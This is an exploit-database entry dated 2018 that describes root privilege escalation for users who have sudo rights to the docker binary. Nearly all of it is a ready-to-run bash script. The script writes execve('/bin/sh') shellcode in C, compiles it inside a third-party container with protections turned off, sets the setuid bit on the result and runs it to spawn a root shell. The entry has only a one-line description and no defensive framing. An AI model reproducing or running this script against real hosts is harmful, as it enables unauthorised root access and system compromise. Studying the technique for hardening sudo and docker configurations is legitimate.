Docker Sudo Privilege Escalation Exploit

2018-01-20T00:00:00
ID 1337DAY-ID-29583
Type zdt
Reporter Pype
Modified 2018-01-20T00:00:00

Description

If a user has sudo permissions to /usr/bin/docker, it can be leveraged to escalated privileges to root.

                                        
                                            #!/bin/bash

# SUDO Docker Privilege Escalation 
# https://github.com/pyperanger/dockerevil

# SELINUX "bypass" using :z option
# https://docs.docker.com/engine/admin/volumes/bind-mounts/#configure-the-selinux-label


echo "[*] SUDO Docker Privilege Escalation";

echo "[+] Writing shellcode";

cat > /tmp/sud0-d0ck3r.c <<'EOF'

#include <unistd.h>
#include <stdlib.h>
 
unsigned char shellcode[] = \
"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
int main()
{
    setgid(0); 
    setuid(0);
    int (*ret)() = (int(*)())shellcode;
    ret();
}

EOF

echo "[+] Compiling shellcode in container";

sudo docker run -t -v /tmp/:/tmp/:z pype/ubuntu_gcc /bin/sh -c 'gcc -fno-stack-protector -z execstack /tmp/sud0-d0ck3r.c -o /tmp/sud0-d0ck3r && chmod +xs /tmp/sud0-d0ck3r'

echo "[+] r00t sh3ll !";
/tmp/sud0-d0ck3r

#  0day.today [2018-04-14]  #